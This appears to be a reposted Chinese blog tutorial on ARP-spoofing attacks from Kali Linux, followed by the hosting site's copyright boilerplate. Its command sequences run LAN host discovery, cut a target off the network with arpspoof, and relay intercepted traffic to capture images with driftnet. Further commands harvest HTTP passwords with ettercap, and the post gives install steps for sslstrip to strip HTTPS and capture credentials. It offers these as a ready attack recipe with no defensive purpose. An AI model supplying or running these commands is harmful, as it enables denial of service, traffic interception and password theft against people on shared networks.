很久以前的博客才發(fā)現(xiàn)，發(fā)布一下。
這個(gè)系列以后有時(shí)間再做。

arp攻擊

arp路由鏈表,感興趣的自行百度,我的博客我的筆記.

路由指向

介紹兩個(gè)東西.

echo 0 >/proc/sys/net/ipv4/ip_forward #讓經(jīng)過(guò)的數(shù)據(jù)不留通
echo 1 >/proc/sys/net/ipv4/ip_forward #讓數(shù)據(jù)流通

內(nèi)網(wǎng)掃描

這個(gè)在百度上你可以看到很多相關(guān)的方式,比如nmap fping

但是基本上掃描結(jié)果不太號(hào),在虛擬機(jī)上你會(huì)發(fā)現(xiàn)你把主機(jī)的防火墻關(guān)了都掃不到主機(jī).

這里使用netdiscover
當(dāng)然這里也寫(xiě)幾個(gè)nmap之類(lèi)的指令

nmap -PR -sL ip
fping -asg ip
netdiscover -i kali網(wǎng)卡 -r ip(網(wǎng)段)
netdiscover -i eth0 -r 192.168.43.1/30

掃描速度是比較慢的

斷網(wǎng)攻擊

arpspoof -i kali的網(wǎng)卡 -t 目標(biāo)地址 目標(biāo)網(wǎng)卡
arpspoof -i eth0 -t 192.168.43.7 192.168.43.1

arp欺騙信息獲取

1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1 開(kāi)始欺騙讓數(shù)據(jù)經(jīng)過(guò)你的電腦

2.echo 1 >/proc/sys/net/ipv4/ip_forward 放掉數(shù)據(jù)包

獲取圖片

使用工具difinet

difinet -i eth0(網(wǎng)卡)

實(shí)際操作:

圖片會(huì)在那里臨時(shí)保存

由于網(wǎng)絡(luò)問(wèn)題可能會(huì)有點(diǎn)卡

獲取HTTP連接的密碼信息

使用ettercap

其他的操作還是一樣的,要開(kāi)啟arp欺騙

ettercap -Tq -i eth0
-T 文本模式 q 安靜模式 i 網(wǎng)卡

然后等待即可.不過(guò)現(xiàn)在都是https,作用不大

出現(xiàn)中文怎么辦,直接賦值中文亂碼,之后解碼即可

百度搜索url解碼

或者直接使用python

中文編碼
from urllib.parse import quote,unquote
str1 = '中國(guó)'
str2=quote(strl)
print(str2)
解碼
print(unquote(str2))

獲取HTTPS的密碼信息

這個(gè)要先修改以下ettercap的配置文件.

vim /etc/ettercap/etter.conf

使用工具 sslstrip

那個(gè)吐槽一下 kali 2020是沒(méi)有sslstrip的原因是沒(méi)有安裝python2的pip 只有pip3

記住一定要先安裝python2

在kali里面python 默認(rèn)為python2 當(dāng)然你可以用ln -s 修改一下.

apt install python 這個(gè)時(shí)候會(huì)自動(dòng)安裝python 2.7

然后輸入以下指令安裝sslstrip

git clone https://github.com/moxie0/sslstrip.git
cd sslstrip
python setup.py install 

這個(gè)是python2的,如果沒(méi)猜錯(cuò)可能會(huì)遇到OpenSSL報(bào)錯(cuò)說(shuō)沒(méi)有這個(gè)模塊

pip install pyOpenSSL

總結(jié)

本篇文章就到這里了，希望能給你帶來(lái)幫助，也希望您能夠多多關(guān)注本站的更多內(nèi)容！

國(guó)外服務(wù)器租用

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。